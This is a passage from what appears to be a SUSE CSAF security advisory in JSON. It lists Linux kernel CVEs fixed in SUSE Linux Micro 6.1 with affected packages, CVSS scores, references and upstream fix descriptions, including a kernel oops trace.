"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40158",
"url": "https://www.suse.com/security/cve/CVE-2025-40158"
},
{
"category": "external",
"summary": "SUSE Bug 1253402 for CVE-2025-40158",
"url": "https://bugzilla.suse.com/1253402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40158"
},
{
"cve": "CVE-2025-40160",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40160"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen/events: Return -EEXIST for bound VIRQs\n\nChange find_virq() to return -EEXIST when a VIRQ is bound to a\ndifferent CPU than the one passed in. With that, remove the BUG_ON()\nfrom bind_virq_to_irq() to propogate the error upwards.\n\nSome VIRQs are per-cpu, but others are per-domain or global. Those must\nbe bound to CPU0 and can then migrate elsewhere. The lookup for\nper-domain and global will probably fail when migrated off CPU 0,\nespecially when the current CPU is tracked. This now returns -EEXIST\ninstead of BUG_ON().\n\nA second call to bind a per-domain or global VIRQ is not expected, but\nmake it non-fatal to avoid trying to look up the irq, since we don\u0027t\nknow which per_cpu(virq_to_irq) it will be in.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40160",
"url": "https://www.suse.com/security/cve/CVE-2025-40160"
},
{
"category": "external",
"summary": "SUSE Bug 1253400 for CVE-2025-40160",
"url": "https://bugzilla.suse.com/1253400"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2025-40160"
},
{
"cve": "CVE-2025-40167",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40167"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: detect invalid INLINE_DATA + EXTENTS flag combination\n\nsyzbot reported a BUG_ON in ext4_es_cache_extent() when opening a verity\nfile on a corrupted ext4 filesystem mounted without a journal.\n\nThe issue is that the filesystem has an inode with both the INLINE_DATA\nand EXTENTS flags set:\n\n EXT4-fs error (device loop0): ext4_cache_extents:545: inode #15:\n comm syz.0.17: corrupted extent tree: lblk 0 \u003c prev 66\n\nInvestigation revealed that the inode has both flags set:\n DEBUG: inode 15 - flag=1, i_inline_off=164, has_inline=1, extents_flag=1\n\nThis is an invalid combination since an inode should have either:\n- INLINE_DATA: data stored directly in the inode\n- EXTENTS: data stored in extent-mapped blocks\n\nHaving both flags causes ext4_has_inline_data() to return true, skipping\nextent tree validation in __ext4_iget(). The unvalidated out-of-order\nextents then trigger a BUG_ON in ext4_es_cache_extent() due to integer\nunderflow when calculating hole sizes.\n\nFix this by detecting this invalid flag combination early in ext4_iget()\nand rejecting the corrupted inode.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40167",
"url": "https://www.suse.com/security/cve/CVE-2025-40167"
},
{
"category": "external",
"summary": "SUSE Bug 1253458 for CVE-2025-40167",
"url": "https://bugzilla.suse.com/1253458"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40167"
},
{
"cve": "CVE-2025-40170",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40170"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: use dst_dev_rcu() in sk_setup_caps()\n\nUse RCU to protect accesses to dst-\u003edev from sk_setup_caps()\nand sk_dst_gso_max_size().\n\nAlso use dst_dev_rcu() in ip6_dst_mtu_maybe_forward(),\nand ip_dst_mtu_maybe_forward().\n\nip4_dst_hoplimit() can use dst_dev_net_rcu().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40170",
"url": "https://www.suse.com/security/cve/CVE-2025-40170"
},
{
"category": "external",
"summary": "SUSE Bug 1253413 for CVE-2025-40170",
"url": "https://bugzilla.suse.com/1253413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40170"
},
{
"cve": "CVE-2025-40178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npid: Add a judgment for ns null in pid_nr_ns\n\n__task_pid_nr_ns\n ns = task_active_pid_ns(current);\n pid_nr_ns(rcu_dereference(*task_pid_ptr(task, type)), ns);\n if (pid \u0026\u0026 ns-\u003elevel \u003c= pid-\u003elevel) {\n\nSometimes null is returned for task_active_pid_ns. Then it will trigger kernel panic in pid_nr_ns.\n\nFor example:\n\tUnable to handle kernel NULL pointer dereference at virtual address 0000000000000058\n\tMem abort info:\n\tESR = 0x0000000096000007\n\tEC = 0x25: DABT (current EL), IL = 32 bits\n\tSET = 0, FnV = 0\n\tEA = 0, S1PTW = 0\n\tFSC = 0x07: level 3 translation fault\n\tData abort info:\n\tISV = 0, ISS = 0x00000007, ISS2 = 0x00000000\n\tCM = 0, WnR = 0, TnD = 0, TagAccess = 0\n\tGCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n\tuser pgtable: 4k pages, 39-bit VAs, pgdp=00000002175aa000\n\t[0000000000000058] pgd=08000002175ab003, p4d=08000002175ab003, pud=08000002175ab003, pmd=08000002175be003, pte=0000000000000000\n\tpstate: 834000c5 (Nzcv daIF +PAN -UAO +TCO +DIT -SSBS BTYPE=--)\n\tpc : __task_pid_nr_ns+0x74/0xd0\n\tlr : __task_pid_nr_ns+0x24/0xd0\n\tsp : ffffffc08001bd10\n\tx29: ffffffc08001bd10 x28: ffffffd4422b2000 x27: 0000000000000001\n\tx26: ffffffd442821168 x25: ffffffd442821000 x24: 00000f89492eab31\n\tx23: 00000000000000c0 x22: ffffff806f5693c0 x21: ffffff806f5693c0\n\tx20: 0000000000000001 x19: 0000000000000000 x18: 0000000000000000\n\tx17: 00000000529c6ef0 x16: 00000000529c6ef0 x15: 00000000023a1adc\n\tx14: 0000000000000003 x13: 00000000007ef6d8 x12: 001167c391c78800\n\tx11: 00ffffffffffffff x10: 0000000000000000 x9 : 0000000000000001\n\tx8 : ffffff80816fa3c0 x7 : 0000000000000000 x6 : 49534d702d535449\n\tx5 : ffffffc080c4c2c0 x4 : ffffffd43ee128c8 x3 : ffffffd43ee124dc\n\tx2 : 0000000000000000 x1 : 0000000000000001 x0 : ffffff806f5693c0\n\tCall trace:\n\t__task_pid_nr_ns+0x74/0xd0\n\t...\n\t__handle_irq_event_percpu+0xd4/0x284\n\thandle_irq_event+0x48/0xb0\n\thandle_fasteoi_irq+0x160/0x2d8\n\tgeneric_handle_domain_irq+0x44/0x60\n\tgic_handle_irq+0x4c/0x114\n\tcall_on_irq_stack+0x3c/0x74\n\tdo_interrupt_handler+0x4c/0x84\n\tel1_interrupt+0x34/0x58\n\tel1h_64_irq_handler+0x18/0x24\n\tel1h_64_irq+0x68/0x6c\n\taccount_kernel_stack+0x60/0x144\n\texit_task_stack_account+0x1c/0x80\n\tdo_exit+0x7e4/0xaf8\n\t...\n\tget_signal+0x7bc/0x8d8\n\tdo_notify_resume+0x128/0x828\n\tel0_svc+0x6c/0x70\n\tel0t_64_sync_handler+0x68/0xbc\n\tel0t_64_sync+0x1a8/0x1ac\n\tCode: 35fffe54 911a02a8 f9400108 b4000128 (b9405a69)\n\t---[ end trace 0000000000000000 ]---\n\tKernel panic - not syncing: Oops: Fatal exception in interrupt",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40178",
"url": "https://www.suse.com/security/cve/CVE-2025-40178"
},
{
"category": "external",
"summary": "SUSE Bug 1253463 for CVE-2025-40178",
"url": "https://bugzilla.suse.com/1253463"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
